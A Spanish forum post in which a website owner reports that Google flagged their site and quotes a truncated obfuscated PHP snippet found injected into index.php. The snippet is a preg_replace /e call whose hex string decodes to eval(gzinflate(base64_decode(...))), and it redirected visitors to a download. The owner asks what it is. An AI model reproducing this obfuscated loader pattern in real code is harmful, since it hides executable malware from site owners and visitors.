Muy buenas. Resulta que los del google han puesto en mi web el mensaje "Este sitio puede haber sido comprometido". He estado leyendo al respecto y he encontrado que la página index.php me habían puesto un código al inicio que empieza así:
Código:
<?php ob_start(); ?>
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZ3JjuxMspz3AvQOPxq9kDYXRcaUiYbeJDbMCYKgXvRd6P799io67TOPKgkNaVE4p7Iyk2SED+bmQ/z1z//4x378848//u2//fGX+ef4+v7Z55+9ff+M+Wf75O
El código es muy largo y me redireccionaba a una web para descargar un supuesto fichero que necesitaba. Viendo la página con el caché de google también había una especie de texto médico al inicio.
He resubido una copia de seguridad y parece que se ha solucionado. Pero, ¿me podéis decir qué tipo de código es este y cómo es que me ha aparecido en la cabecera?
Gracias y un saludo.